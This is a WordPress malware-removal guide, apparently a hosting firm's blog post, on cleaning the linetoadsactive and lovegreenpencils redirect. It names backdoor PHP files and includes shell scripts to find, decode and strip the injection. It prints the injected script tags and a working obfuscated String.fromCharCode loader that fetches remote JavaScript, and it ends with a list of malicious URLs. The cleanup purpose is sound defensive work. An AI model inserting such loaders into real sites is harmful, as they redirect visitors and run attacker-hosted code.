How to remove linetoadsactive redirect malware

Nick

For the love of God make it stop… how to remove the linetoadsactive redirect (and others)

*UPDATE – If you would like one of our WordPress professionals to remove this for you, give us a call at (844) 939-2704 or hit the chat button on this page.

You’re probably here because your WordPress site (or even worse, your client’s WordPress site) is redirecting/timing out and you’ve found the culprit to be linetoadsactive.com or lovegreenpencils.ga.  Maybe you removed some of the malicious index.php files that were generated or injected with the code, but still can’t get it to stop redirecting, and are about to quietly close your laptop, turn off your phone and walk off into the sunset. Rest assured weary web developer, it can be defeated.

This is an especially annoying, multifaceted hack that can infect your entire server.  We have found instances of this malware that are so thorough that the malicious code is injected into hundreds of PHP files AND database entries, in every WordPress install on the server.  You’ll need to perform these steps on every WordPress site on your server to be sure that it has been eliminated.

This guide assumes that you are a web developer, are familiar with SSH and phpMyAdmin, have backed up your site, and are proficient enough to restore your site if something goes wrong during the removal – so please use this information at your own risk.  If you would like one of our WordPress professionals to remove this for you, give us a call at (844) 939-2704 or hit the chat button on this page.


1. Remove the backdoor

In most of the cases we’ve seen, this hack comes from unlicensed/unofficial or pirated WordPress plugins that bundle the following PHP files, which are used as a backdoor to gain entry to your site:

rms-script-ini.php
rms-script-mu-plugin.php
rms_unique_wp_mu_pl_fl_nm.php

The first step is to search your server for every instance of these files and remove them, along with any lines of code in any file that reference them.  Note that if anyone visits your site, the files will be regenerated unless you remove all 3 of them – so you’ll need to double-check at the end of this process that they are still gone after deleting them.

* A word of caution – removing these 3 files may cause WordPress to give a critical error, because the compromised plugins they were bundled with will still be trying to call them.  You must either replace the plugin in question with the proper licensed version from the vendor, remove the code from the plugin’s files that references the above files, or disable the plugin completely to avoid this scenario.
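As an added example (not part of the original article), the shell functions below do the step 1 search the way you would over SSH: list every copy of the three backdoor files under a document root, list every PHP file that references them by name (the pirated plugin that keeps re-creating them will show up here), and delete the files once that list has been reviewed. The tree built under a temporary directory is constructed for the demo and is not real infection data; WordPress auto-loads anything under wp-content/mu-plugins, which is why that directory is worth checking first.

```shell
#!/bin/sh
# Added example (not from the original article): locate the step 1 backdoor
# files and the PHP files that reference them. Pass the web root that holds
# your WordPress install(s) as $1; the paths used at the bottom are constructed.

# Print every file under $1 whose name is one of the three known backdoor files.
find_backdoor_files() {
    root=$1
    find "$root" -type f \
        \( -name rms-script-ini.php \
        -o -name rms-script-mu-plugin.php \
        -o -name rms_unique_wp_mu_pl_fl_nm.php \) 2>/dev/null
}

# Print every .php file under $1 that mentions one of the backdoor file names
# (an include/require in a bundled plugin, for example). These references are
# what regenerates the files after a visit, so they must be removed or the
# plugin replaced with a licensed copy; deleting the files alone is not enough.
find_backdoor_references() {
    root=$1
    find "$root" -type f -name '*.php' -exec grep -lE \
        'rms-script-ini\.php|rms-script-mu-plugin\.php|rms_unique_wp_mu_pl_fl_nm\.php' \
        {} + 2>/dev/null || true
}

# Delete the backdoor files under $1 and print how many were removed.
# Review the output of find_backdoor_files before calling this.
remove_backdoor_files() {
    root=$1
    count=$(find_backdoor_files "$root" | wc -l | tr -d ' ')
    find_backdoor_files "$root" | while IFS= read -r f; do rm -f "$f"; done
    echo "$count"
}

# --- Demo on a constructed tree (not a real infected site) ---
DEMO=$(mktemp -d)
mkdir -p "$DEMO/wp-content/mu-plugins" "$DEMO/wp-content/plugins/pirated-plugin"
printf '<?php // constructed stand-in for the dropped backdoor file\n' \
    > "$DEMO/wp-content/mu-plugins/rms-script-mu-plugin.php"
printf '<?php require_once __DIR__ . "/rms-script-ini.php"; // constructed reference\n' \
    > "$DEMO/wp-content/plugins/pirated-plugin/loader.php"
printf '<?php echo "clean plugin"; // constructed clean file\n' \
    > "$DEMO/wp-content/plugins/pirated-plugin/clean.php"

echo "Backdoor files under $DEMO:"
find_backdoor_files "$DEMO"
echo "Files that reference them (fix or replace the plugin they belong to):"
find_backdoor_references "$DEMO"
```

Run the two find functions first, on every install on the server, and only call remove_backdoor_files once you know which plugin the references belong to; otherwise the files come back on the next page view, which is exactly the check step 4 asks you to repeat.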


2. Search the database for injected redirect script

This dastardly redirect not only infects PHP files but also injects the redirection script into your WordPress database.  You need to log in to phpMyAdmin and search your wp database for the strings “linetoadsactive” or “lovegreenpencils”, depending on which one your site is redirecting to.  You will likely get many results in wp_posts, as well as your site’s URL setting in wp_options.  First, restore your site’s URL in the wp_options table.  Then copy the string that was found in your wp_posts table, which should look something like this:

<script type='text/javascript' src='https://trend.linetoadsactive.com/m.js?n=ns1'></script>

Now do a SQL search & replace for all instances of the string you found, replacing it with nothing.  Remember to do this for every WordPress installation on your server.


3. Search php & html files for malicious code

Now you need to use SSH commands to search for “linetoadsactive” and “lovegreenpencils” in all of your PHP & HTML files.  The results you get should look similar to the code injected into your database, but possibly with a different string at the end:

<script type='text/javascript' src='https://trend.linetoadsactive.com/m.js?n=nb5'></script>

Now do a search and replace of all PHP & HTML files, replacing this string with nothing.
But you’re not done yet – this hateful little script has also injected obfuscated code that will still cause your site to redirect.  Do another SSH search for all PHP & HTML files containing “115,99,114,105,112,116”.  You will get something like this:

<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>

This is the same loader, obfuscated: the String.fromCharCode sequences decode to “script”, “text/javascript”, the URL https://trend.linetoadsactive.com/m.js and “head”, so the code creates a script element pointing at the same m.js file as the plain tags above and appends it to the page head.
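The search, decode and strip work of step 3, as an added example that is not from the original article. The functions below find PHP/HTML files that contain either domain or the 115,99,114,105,112,116 signature, decode every String.fromCharCode(...) list in a file so you can confirm which host an obfuscated loader contacts before deleting it, and strip both forms of the injected tag in place while keeping a .bak copy. The header.php sample written to a temporary directory is constructed for the demo and contains only the strings already shown on this page.

```shell
#!/bin/sh
# Added example (not from the original article): find, decode and strip the
# injected redirect tags described in step 3. Pass a web root as $1 to the
# find/strip functions; the sample file created at the bottom is constructed.

# Print every .php/.html file under $1 containing the plain redirect domains
# or the char-code signature of the obfuscated loader.
find_injected_files() {
    root=$1
    find "$root" -type f \( -name '*.php' -o -name '*.html' \) -exec grep -lE \
        'linetoadsactive|lovegreenpencils|115,99,114,105,112,116' {} + 2>/dev/null || true
}

# Turn a comma-separated char-code list such as "115,99,114,105,112,116" back
# into the text it hides (here: "script").
decode_charcodes() {
    printf '%s\n' "$1" | awk -F, '{ for (i = 1; i <= NF; i++) printf "%c", $i + 0; printf "\n" }'
}

# Print every decoded String.fromCharCode(...) argument found in file $1, one per
# line, so the loader's target URL can be read before the block is removed.
decode_obfuscated_strings() {
    grep -oE 'String\.fromCharCode\([0-9, ]+\)' "$1" \
        | sed -E 's/String\.fromCharCode\(([0-9, ]+)\)/\1/; s/ //g' \
        | while IFS= read -r codes; do decode_charcodes "$codes"; done
}

# Remove, in place, (a) the plain <script src='https://<sub>.linetoadsactive.com
# or .lovegreenpencils.ga/m.js?n=...'> tag and (b) a single-line obfuscated
# <script type=text/javascript>...String.fromCharCode...</script> block.
# The original is kept as $1.bak so the edit can be reverted or diffed.
strip_redirect_tags() {
    f=$1
    cp "$f" "$f.bak"
    sed -E \
        -e "s#<script type=['\"]text/javascript['\"] src=['\"]https://[a-z0-9.-]*(linetoadsactive\.com|lovegreenpencils\.ga)/m\.js[?]n=[a-z0-9]+['\"]></script>##g" \
        -e 's#<script type=text/javascript>[^<]*String\.fromCharCode[^<]*</script>##g' \
        "$f.bak" > "$f"
}

# --- Demo on a constructed sample (the strings are the ones quoted in the article) ---
DEMO=$(mktemp -d)
SAMPLE="$DEMO/header.php"
cat > "$SAMPLE" <<'EOF'
<?php // constructed sample: a theme file carrying both injected forms
?><script type='text/javascript' src='https://trend.linetoadsactive.com/m.js?n=nb5'></script>
<head>
<script type=text/javascript>var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);</script>
</head>
EOF

echo "Injected files under $DEMO:"
find_injected_files "$DEMO"
echo "Decoded fromCharCode strings in $SAMPLE:"
decode_obfuscated_strings "$SAMPLE"
```

Decode before you strip: if decode_obfuscated_strings prints a host that is not in the list at the end of this article, add it to the grep pattern in find_injected_files so the same pass catches it on the other installs on the server. Use the .bak copies to diff what changed and delete them once the site is confirmed clean.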


4. Final steps

As I’ve mentioned before, you need to repeat these steps on every WordPress installation on your server. If you have any that are just sitting there inactive, now is a good time to delete them.  Also go back to step 1 and make sure that the 3 PHP files have not reappeared – if they have, delete them again, visit your site again in a private window, and check to see if they have reappeared. If they have, you haven’t successfully removed the backdoor.

If you would like one of our WordPress professionals to remove this redirect for you, give us a call at (844) 939-2704 or hit the chat button on this page.


List of URLs associated with this malware
https://well.linetoadsactive.com/det.php
https://done.linetoadsactive.com/go.php
https://live.linetoadsactive.com/go.php
https://trend.linetoadsactive.com/go.php
https://trend.linetoadsactive.com/m.js?n=nb5
https://trend.linetoadsactive.com/m.js?n=ns1
https://boliverfernanrdos.ga/?p=hfqwmzrrmu5gi3bpguydgni
https://boliverfernanrdos.ga/w_31.js
https://load7.biz/sw/w1s.js
https://dock.lovegreenpencils.ga/m.js?n=nb5
https://cht.secondaryinformtrand.com/m.js?n=nb5
default7.com
test246.com
test0.com
distinctfestive.com
ableoccassion.com
https://djengysdaro.com
